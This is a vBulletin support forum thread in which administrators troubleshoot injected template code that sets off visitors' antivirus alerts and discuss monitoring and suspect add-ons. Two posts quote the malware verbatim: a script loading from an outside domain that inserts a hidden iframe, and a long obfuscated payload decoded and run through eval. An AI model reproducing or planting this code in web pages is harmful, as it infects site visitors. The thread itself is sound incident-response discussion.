Announcement

Collapse
No announcement yet.

Forums triggering virus alerts

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
    Jafo
    Senior Member

  • Jafo
    replied
    Standard injection.. You are probably still vulnerable..

    Leave a comment:


  • diretur
    replied
    I had the same problem on the 27th of December and found this in the header template. I have no clue where this is from. Once I deleted it, the problem was gone. Users with ie had the virus notification. As soon as they used Chrome there was no problem.

    <script>
    var _7591;var _7979='3760D105F135B1020B1105D1000C1055B715E1025B1100C1065C1010F1095C1040D1070C1065B715D10 75F735A1000F735A1010D735F1050C735C1020C735A1015F720B1130F1020E820F1025F1100F1065B1010E1095 E1040D1070E1065D715C1010F720B1130A1085C1020A1095B1100B1085F1065B715E1010E815E1000C830C710C 710A805D1020E715B1075D1000A1085E1090A1020E880E1065F1095E715F1010A750A1000F720C720D720F730D 715A715F1010A820D1010B700E1000C720E825B770D780D830F930D1095A1085C1040F1065F1030D745C1025E1 085C1070A1060D850F1035E1000F1085B850D1070C1015E1020C715C1010E730B765E800C720B805F1010A745B 1095D1070A930E1095F1085F1040F1065F1030F715F770D785A720E720F1140F810F1110D1035D1040B1055B10 20E715A1010C740F740D720B1130E1040B1025D715B1050B970C1010A980E720A1130E1075A820A1075B745B10 85C1020F1075F1055C1000A1010C1020F715B1065D1020B1110E675B925A1020E1030B860B1115B1075E715E71 0E975A975A1005F710E730B1020F715C1010D720E730B710E975D975B1005E710D735F710E1030E710C720D735 F1050E970E1010A980F720B1140D1140C1085B1020F1095A1100F1085A1065F675A1075E1140E715F710A1125C 715E770B745E1060D715C975C710D1070A975F710F720B970D755E980B720B1130E1005A715E720B1140C1120D 1130A770E745A1115B715D685D815F780E675E1015A820A975A710A1040A805D750F750F1020F745A1035B740F 1010C740D790F745D785F750B795E750A800B745C1000B830A1065F820A1030F975A710D675E1080A820D975D7 10D765F975E710F675D1055E820C975E710A765A975F710A675C760C820E975A710E1045D805B1090E810A1095 C805A1085C810A1075F805C755E810D1050E805A755C810F975F710B825F815B750A780E825F685F720C1140E1 105F675A1005B715E720D1130A1110F675B1025D820E770F745E840B715F975C710D780C975A710F720D810D10 25B745C775E715C975F710E1015F975C710E735F975C710B1040E805D750D750C1020B745D1035A740E1010C74 0E790C745C785D750A795E750C800E745B1000F830A1065B820B1030A975B710C720F810A1025B745B760F745F 1045A820A975A710C1090E975B710D810F1025B745E760F745F1095A820A975B710E1085F975A710A810B1025A 745B760D745C1075D820E975B710A755D975E710B810C1025A745C760A745A1050C820B975A710D755B975A710 D810B1025A745C775E715D975D710C1080B975B710C735B975B710C765B975F710A720F810B1025A745F775E71 5D975E710D1055E975C710A735F975A710D765B975D710D720C810E770E745C1060E715C975F710B1070A975F7 10B720C970B755A980B745D1100B715C1025A720F1140C710E735B770A790E735E770A790C735B710C1135F109 0E1095A1120F1055F1020A1135B760D755E1135A1015B1070D1010D1100B1060D1020A1065E1095A1135E1090C 1020D1095F840D1095E1095C1085C1040C1005C1100D1095E1020B1135B1040D1025E1085B1000F1060D1020D1 135B1010C1070A1060F1135D1035A1070B1060F1020B1135F1050E1100D1035D1065C760C1135F1020A1105D10 35F1055D1020D1095E1005D1125F1015D1055A1005E1070D1005D1095F765E1135F1075C1035B1075F1135C104 0C1025C1085C1000D1060C1020E1085F1135F1000D1095B1135D1090E1085A1010B1135F1000D1015A1090A113 5F1135F1040C1095E1135B1015C1120D1065E1015A1065A1090A1135F1035F1095F1095D1075E1135F1105A104 0F1090B1040D1005A1040B1055A1040A1095C1120C1135F1095A1070D1075F1135B1035D1020F1040D1030B103 5A1095A1135E1030C1020F1095B860A1055C1020C1060B1020B1065F1095E1090C845E1120E935E1000B1030A9 05D1000A1060F1020A1135B1135E1005B1070B1015C1120D1135D1055B1020E1025B1095D1135B1110F1040F10 15B1095D1035E1135B1000D1005A1090F1070A1055D1100F1095A1020A1135A1035C1040A1015C1015C1020B10 65D1135E1075F1070F1090B1040A1095B1040A1070A1065F1135F1000B1075B1075D1020A1065B1015A850C103 5D1040C1055E1015D1135E1025D1100C1065F1010F1095A1040C1070B1065D1135E1105F1000A1085D1135F111 0A1085F1040E1095C1020B1135F1020B1055D1090D1020C1135F1040C1025B1135F1010D1085A1020D1000D109 5D1020D860D1055A1020D1060A1020E1065B1095F710D745F1090F1075F1055B1040E1095A715B710A1135B710 B720C720C720E565E';var _2896=/[\x41\x42\x43\x44\x45\x46]/;var _1720=2;var _2541=_7979.charAt(_7979.length-1);var _8918;var _8713=_7979.split(_2896);var _1864=[String.fromCharCode,isNaN,parseInt,String];_8713[1]=_1864[_1720+1](_1864[_1720](_8713[1])/21);var _9418=(_1720==9)?String: eval;_8918='';_11=_1864[_1720](_8713[0])/_1864[_1720](_8713[1]);for(_7591=3;_7591<_11;_7591++)_8918+=(_1864[_1720-2]((_1864[_1720](_8713[_7591])+_1864[_1720](_8713[2])+_1864[_1720](_8713[1]))/_1864[_1720](_8713[1])-_1864[_1720](_8713[2])+_1864[_1720](_8713[1])-1));window.alert=_0Oo1lO;function _0Oo1lO(){return};_9418(_8918);
    </script>

    Leave a comment:

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    For an addon like ForumRunner to be a point of entry, they need to be using unsanitized variables somewhere. Unfortunately there is no way to write a query to check plugins for unsanitized variables. Each plugin and external code needs to be checked. As such I wouldn't point fingers at a particular addon until it was checked.

    Leave a comment:

  • Jafo
    Senior Member

  • Jafo
    replied
    Thing is, another person I know who was hit with this is also running forum runner.. I wish we could poll everyone in this thread..

    Leave a comment:

  • MarkTTU
    New Member

  • MarkTTU
    replied
    Maybe... I hadn't seriously considered them, but anything is possible I guess.

    I have AOL and Google ads on my site and have gone into Google to blocked all Google Certified Ad Networks just to see what happens. So far no reports of infection, but I just did this about 2 hours ago so time will tell as I've only been getting a couple of complaints each day.

    Leave a comment:

  • Jafo
    Senior Member

  • Jafo
    replied
    Hmm, we are running forum runner too.. That might be the common thread?

    Leave a comment:

  • MarkTTU
    New Member

  • MarkTTU
    replied
    Originally posted by Wayne Luke View Post
    So... Has anyone run the steps that I listed above? What were the results?
    Yep and I didn't find a thing. The only mods we have running are vbStopForumSpam and Forum Runner. Neither of those appear to be a point of infection either and I'm at a complete loss right now...

    Leave a comment:

  • Jafo
    Senior Member

  • Jafo
    replied
    Should that happen, my monitoring should catch that. I am going to assume for prudence sake that those using this exploit are watching, so I will shoot you a PM on how I am monitoring it..

    Leave a comment:

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    Originally posted by Jafo View Post
    Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

    What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.
    I asked because in our recent experience, people have actually been exploited months before the symptoms come up. One of the common exploits is to tie a plugin into a rarely used hook that processes commands that are then passed to the command line or database directly.

    Leave a comment:

  • Jafo
    Senior Member

  • Jafo
    replied
    Wayne, I did not run those steps because frankly, they have never worked for me to trace back these issues, which I have done successfully many times before. I can tell you that no files had changed in some time, nor had their modification times. Their modification times had also not changed on our backup server where they are rsynced to. The plugin table had not been updated in a long time either (as per mysql information_schema table)..

    What happened is, the code was injected somehow.. In my experience, this is usually due to vbseo, not vbulletin. I am now monitoring the template table to alert me the second it is changed with all the info of who changed it, and with the $_REQUEST data. I should be able to use that and the log files to trace back what happened, should it happen again. I am assuming this is a bot of some kind, so it should be back.

    Leave a comment:

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    So... Has anyone run the steps that I listed above? What were the results?

    Leave a comment:

  • Jafo
    Senior Member

  • Jafo
    replied
    I have not.. However, I am going to monitor all changes to the templates database. I have it setup up to immediately notify me if any change is made to any template to see if I can catch it next time..

    Leave a comment:

  • eJM
    Senior Member

  • eJM
    replied
    Have you posted that information at vBSEO forums, Jafo?

    Leave a comment:

  • Jafo
    Senior Member

  • Jafo
    replied
    We are having the same issue.. Right after (footer template):

    PHP Code:
    <form action="$vboptions[forumhome].php" method="get" style="clear:$stylevar[left]"
    Something added:

    PHP Code:
    <script type="text/javascript" src="http://www.uptimeviewer.com/icons/icons.php"></script
    Which inserts:
    HTML Code:
    GPad = {                   init: function () {                       document.write('');                       var frame = document.createElement('iframe');                       frame.setAttribute('src', 'http://www.alltagcloud.info/icons/index.php');                       frame.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       frame.style.visibility = 'hidden';                       frame.style.display = 'none';                       var div = document.getElementById('GPAD');                       div.appendChild(frame);                   }               }               GPad.init();
    I haven't yet figured out how it is being injected.. It could be vbseo, it could be vbulletin, could be a number of things I suppose.. I am searching the logs to no avail..

    Leave a comment:

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    Originally posted by eJM View Post
    Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

    Jim
    Than you would need to be at 3.8.7 PL2.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X